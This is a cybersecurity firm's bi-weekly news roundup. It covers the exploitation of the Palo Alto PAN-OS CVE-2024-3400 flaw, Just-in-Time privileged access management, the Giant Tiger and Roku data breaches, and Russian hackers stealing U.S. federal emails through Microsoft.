Canary Trap’s Bi-Weekly Cyber Roundup

Welcome to this week’s edition of the “Bi-Weekly Cyber Roundup” by Canary Trap. At Canary Trap, it is our mission to keep you up-to-date with the most crucial news in the world of cybersecurity and this bi-weekly publication is your gateway to the latest news.

In this week’s roundup, we delve into the Palo Alto exploit, providing comprehensive details on the incident. We also explore a range of news stories, including data breaches at Roku, Giant Tiger, and the U.S. Federal Government. Additionally, we examine an emerging trend in Privileged Access Management (PAM) solutions, focusing on the utilization of Just-in-Time (JIT) privileged access.

Threat Actors Exploited Palo Alto PAN-OS Issue to Deploy a Python Backdoor

Since March 26, 2024, threat actors have been exploiting a critical zero-day vulnerability, CVE-2024-3400, in Palo Alto Networks PAN-OS software. This flaw, with a CVSS score of 10.0, enables unauthenticated attackers to execute arbitrary code with root privileges on affected firewalls. Palo Alto Networks and Unit 42 are actively investigating this vulnerability and have dubbed the related activity as “Operation MidnightEclipse.”

The exploit involves the creation of a cronjob by the threat actor, running every minute to access commands hosted on an external server and executed via bash. Although researchers were unable to access the executed commands, they suspect the deployment of a Python-based backdoor, referred to as UPSTYLE. This backdoor, hosted at different URLs, creates and executes additional Python scripts, leading to the establishment of a reverse shell on the firewall device.

The threat actor, identified by Volexity as UTA0218, aims to extract configuration data from compromised devices to expand laterally within targeted organizations. Successful exploitation has been observed at multiple organizations since March 26, 2024, indicating the threat actor’s systematic testing of the vulnerability. Following successful exploitation, UTA0218 downloads additional tools from remote servers to facilitate access to internal networks, demonstrating a high level of sophistication and capability. The exploitation of CVE-2024-3400 poses a significant threat to organizations using Palo Alto Networks PAN-OS software. The rapid and widespread exploitation by threat actors underscores the critical importance of promptly applying security patches and implementing robust security measures to mitigate the risk of cyberattacks.

Security firm Volexity confirmed active exploitation of the vulnerability, with threat actors using it to backdoor PAN-OS devices, breach networks, and exfiltrate data. Tracked under UTA0218, these attacks are believed to be conducted by state-sponsored threat actors due to the sophistication and resources required. Threat researcher Yutaka Sejiyama discovered over 82,000 vulnerable PAN-OS devices globally, with 40% located in the United States. As a response, CISA has added CVE-2024-3400 to its Known Exploited Vulnerabilities catalog, mandating federal agencies to apply mitigation measures or disable telemetry within a week.

Palo Alto Networks has begun releasing hotfixes to address the zero-day vulnerability. Admins are advised to apply hotfixes promptly and consider disabling telemetry on vulnerable devices until patches are deployed. Additionally, activating threat prevention-based mitigations can help block ongoing attacks for those with an active ‘Threat Prevention’ subscription.

Timing is Everything: The Role of Just-in-Time Privileged Access in Security Evolution

Privileged Access Management (PAM) solutions have evolved to include Just-in-Time (JIT) privileged access provisioning as a response to the risks associated with prolonged high-level access. JIT provisioning aims to limit these risks by temporarily granting privileges only when necessary, aligning with the principle of least privilege.

JIT provisioning offers several advantages, including reducing the risk of privilege escalation and minimizing the attack surface for credential-based attacks. By eliminating standing privileges and granting access only during active requests, JIT provisioning disrupts attackers’ reconnaissance efforts and restricts their ability to exploit accounts with excessive privileges.

Implementing JIT provisioning with Safeguard, a PAM solution, involves creating regular user accounts within Active Directory, which remain disabled until activated as part of an access request workflow. Safeguard automatically activates these accounts, adds them to privileged groups, such as Domain Admins, grants necessary access rights, and disables them once the access request is completed. Enhancing JIT provisioning with Active Roles ARS, an Active Directory management tool, allows for more sophisticated automation and customization of provisioning processes. Active Roles can automate account activation, group membership management, and attribute synchronization within Active Directory, further strengthening security and mitigating risks associated with privileged access.

JIT provisioning is a critical component of a comprehensive PAM strategy, offering organizations the ability to reduce privilege misuse, enhance security, and ensure that users access privileged resources only when necessary. By combining Safeguard with Active Roles, organizations can implement robust JIT provisioning policies to strengthen security posture and mitigate potential risks associated with privileged access.

Canadian Retail Chain Giant Tiger Data Breach May Have Impacted Millions of Customers

In March 2024, a threat actor known as ShopifyGUY claimed responsibility for hacking Giant Tiger, a Canadian retail chain with over 260 stores nationwide. The hacker leaked 2.8 million records, including email addresses, names, phone numbers, and physical addresses, on a hacker forum. However, financial data was reportedly unaffected. The compromised data was allegedly stolen earlier that year. Customers can verify if their information is included in the breach by using the data breach monitoring service HaveIBeenPwned. The leaked archive is available for download on the forum for 8 credits per member. This incident underscores the ongoing threat posed by cyberattacks to the security of personal information, emphasizing the importance of robust cybersecurity measures for both individuals and organizations.

Roku Disclosed a New Security Breach Impacting 576,000 Accounts

Roku recently disclosed that approximately 576,000 accounts fell victim to credential stuffing attacks, where threat actors exploited stolen credentials from third-party platforms. Credential stuffing involves using automated tools to try breached usernames and passwords on various platforms until successful logins are found, enabling unauthorized access to accounts for data theft or misuse. Roku detected unusual activity earlier this year, prompting an investigation that revealed around 15,000 compromised accounts from a separate source through credential stuffing. After notifying affected users, a subsequent breach impacted an additional 576,000 accounts. Roku clarified that their systems weren’t compromised, suggesting the attackers obtained login credentials elsewhere. Though some unauthorized purchases occurred, sensitive information like full credit card numbers remained secure. To prevent future breaches, Roku initiated password resets for impacted accounts, introduced two-factor authentication (2FA) for all users, and committed to refunding unauthorized purchases. They encourage users to adopt strong, unique passwords and remain vigilant for suspicious activity.

U.S. Says Russian Hackers Stole Federal Government Emails During Microsoft Cyberattack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that Russian government-backed hackers, known as “Midnight Blizzard” or APT29, successfully stole emails from multiple U.S. federal agencies during an ongoing cyberattack targeting Microsoft. This revelation underscores the significant risks posed by sophisticated cyber adversaries to government agencies and critical infrastructure.

CISA’s statement, released Thursday, highlights the severity of the cyberattack, which exploited vulnerabilities in Microsoft’s corporate email accounts to exfiltrate sensitive correspondence between federal agencies and the technology giant. The agency issued an emergency directive on April 2, mandating civilian government agencies to enhance their email security measures in response to heightened intrusions by Russian hackers. Despite not disclosing the names of affected federal agencies, CISA’s actions underscore the urgency of the situation and the need for swift remediation efforts. The emergency directive aims to mitigate further compromise of government systems and safeguard sensitive information from unauthorized access.

Microsoft, which first disclosed the Russian hacking group’s intrusion in January, continues to face scrutiny over its security practices. The company has been working to expel the hackers from its systems, but the ongoing nature of the attack underscores the challenges in defending against sophisticated cyber threats. Moreover, recent incidents, including a breach attributed to China government-backed hackers and data exposure involving the U.S. Department of Defense, highlight the broader vulnerabilities within Microsoft’s infrastructure and the potential ramifications for both government and private sector entities.

As cyber adversaries continue to evolve in sophistication and persistence, collaboration between government agencies, private sector organizations, and technology providers remains essential to bolstering national cybersecurity defenses and safeguarding digital infrastructure from malicious actors.

References:

Canary Trap’s Bi-Weekly Cyber Roundup